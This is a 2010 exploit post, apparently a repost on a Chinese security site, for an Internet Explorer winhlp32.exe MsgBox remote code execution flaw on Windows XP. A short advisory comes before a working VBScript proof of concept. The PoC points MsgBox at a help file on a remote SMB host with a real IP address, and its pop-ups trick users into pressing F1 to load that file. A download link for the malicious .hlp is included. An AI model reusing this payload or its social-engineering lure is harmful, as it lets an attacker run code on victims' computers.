首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Internet Explorer 'winhlp32.exe' 'MsgBox()' Remote Code Execution Vulnerability
来源:vfocus.net 作者:Prodeus 发布时间:2010-03-03  

Microsoft Internet Explorer is prone to a remote code execution vulnerability.

Source (iSEC Security Research):
http://isec.pl/vulnerabilities10.html

Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the underlying computer.

Note attackers must use social-engineering techniques to convince an unsuspecting user to press the 'F1' key when the attacker's message box prompts them to do so.

Internet Explorer 6, 7, and 8 are vulnerable when running on the Windows XP platform.

===============================================================
A copy of test.hlp can be downloaded from here:
http://www.exploit-db.com/sploits/msgbox_test_help.zip
===============================================================

<html>
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.hlp"
 
//For i=1 to 2500
//  big = big & "\..\"
//Next
 
 
MsgBox "please press F1 to save the world", ,"please save the world",
big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
</script>
</html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Tod Miller Sudo 1.6.x before 1
·Mozilla Firefox v3.6 and Opera
·iPhone / iTouch FTPDisc 1.0 3
·ProSSHD v1.2 20090726 Buffer O
·Windows XP Home Edition SP3 En
·Todd Miller Sudo local root ex
·Opera <= 10.50 integer overflo
·Easy FTP Server version 1.7.0.
·MiNBank 1.5.0 Remote Command E
·Internet Exploiter II version
·Microsoft OWC Spreadsheet HTML
·McAfee LinuxShield versions 1.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved